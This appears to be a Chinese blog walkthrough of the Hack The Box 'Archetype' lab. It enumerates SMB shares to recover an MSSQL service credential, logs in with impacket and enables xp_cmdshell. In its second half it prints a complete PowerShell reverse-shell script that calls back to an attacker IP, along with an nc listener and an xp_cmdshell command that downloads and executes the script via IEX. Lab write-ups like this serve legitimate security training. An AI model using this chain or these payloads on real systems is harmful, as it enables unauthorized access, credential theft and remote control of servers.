SMB+MSSQL

SMB+MSSQL_第1张图片

常规nmap扫描目标IP,得到有哪些端口号开放以及哪些服务,可以看到SMB协议的139和445端口号开放,伴随着还有MySQL的服务的。

利用SMB中的smbclient工具远程连接并枚举:

smbclient -N -L \\\\{TARGET_IP}\\    #-N:no password ,-L:查找的服务在服务器端是是可适用的。

SMB+MSSQL_第2张图片

针对出现的一组share,经过试验,ADMIN$和C$并不能被访问,因为只能访问backups目录, 根据下述命令枚举backups:

smbclient -N \\\\{TARGET_IP}\\backups

 下图展示了SMB远程连接目标IP,查看目录,下载配置文件,并退出,一整个流程。

SMB+MSSQL_第3张图片

 查看配置文件中的内容(关键内容:密码和用户信息):

 密码:M3g4c0rp123,用户:ARCHETYPE\sql_svc

根据提供的信息,需要采用一个工具连接MSSQL服务器,在这里采用impacket工具。

Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的低级编程访问,对于某些协议(如SMB1-3和MSRPC),提供协议实现本身。数据包可以从零开始构造,也可以从原始数据解析,而面向对象的API使使用深层协议层次结构变得简单。该库提供了一组工具,作为在该库的上下文中可以执行的操作的示例。

关于他如何安装,在这里就不在多余解释。直接采用命令行连接MSSQL:

target_IP前面的是用户,之后会输入前面配置文件中的密码。

python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth

SMB+MSSQL_第4张图片

 首先,需要确认我们连接的对象是否在服务中:

SELECT is_srvrolemember('sysadmin');

 设置相关命令,需要令在该连接模式下可以执行cmd命令。

SMB+MSSQL_第5张图片

 设置成功:

SMB+MSSQL_第6张图片

 到这里,我们已经初步拿到shell了。

持久化shell

SQL Server的shel还略显单薄,既然是Windows,那么就尝试用Powershell脚本、nc监听做一个持久化的连接。

第一行的IP填写最开始获取的Kali IP,注意网段

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.226",443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "# ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()

将它保存到kali的桌面,名称为shell.ps1

之后用python起一个服务器,以便靶机访问脚本、下载脚本,服务器在桌面起,和shell.ps1在同一个文件夹

python3 -m http.server 80

要确保起了后能访问到脚本

SMB+MSSQL_第7张图片

nc起一个监听用于shell交互,端口同上所设置的443

nc -lvnp 443

 返回mssqlclient,让靶机访问、下载、运行脚本,同理xxx是Kali IP

mssqlclient.py ARCHETYPE/[email protected] -windows-auth
SQL \> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.xxx/shell.ps1\");"

如果成功连接在其他两个窗口就可以顺利看到监听到主机,

 

 SMB+MSSQL_第8张图片

 SMB+MSSQL_第9张图片

 『Hack The Box』Archetype

『Hack The Box』Archetype_Ho1aAs的博客-CSDN博客

你可能感兴趣的:(计算机网络,安全,web安全)